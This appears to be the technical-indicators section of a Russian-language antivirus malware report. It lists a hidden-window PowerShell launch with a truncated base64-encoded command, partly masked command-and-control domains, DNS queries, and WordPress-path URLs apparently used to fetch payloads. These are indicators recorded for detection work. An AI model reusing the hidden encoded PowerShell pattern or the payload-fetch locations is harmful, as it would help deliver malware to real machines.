Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAG0AdgBkAGYAbgBwAG0APQAnAEQAcgBtAGsAcABlAGoAcgBiAHUAawBkAHMAJwA7ACQARgBlAHIAcABpAHMAdQBjAGsAdABnAGwAIAA9ACAAJwAyADYAMgAnADsAJABHAG0AbgB0AHkAbABwAHcAYQBuAD0AJwBRAHMAZABzAHkAdgB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\1388689.cvr
- 'st#####.visionarystream.com':443
- 'bh######enterandspas.com':80
- 'up###atom.biz':443
- 'cn##ate.com':80
- http://bh######enterandspas.com/wp-includes/6Vkd7363/
- http://cn##ate.com/wp-content/uploads/D7/
- 'st#####.visionarystream.com':443
- 'up###atom.biz':443
- DNS ASK st#####.visionarystream.com
- DNS ASK bh######enterandspas.com
- DNS ASK tz##yz.com
- DNS ASK up###atom.biz
- DNS ASK cn##ate.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAG0AdgBkAGYAbgBwAG0APQAnAEQAcgBtAGsAcABlAGoAcgBiAHUAawBkAHMAJwA7ACQARgBlAHIAcABpAHMAdQBjAGsAdABnAGwAIAA9ACAAJwAyADYAMgAnADsAJABHAG0AbgB0AHkAbABwAHcAYQBuAD0AJwBRAHMAZABzAHkAdgB...' (со скрытым окном)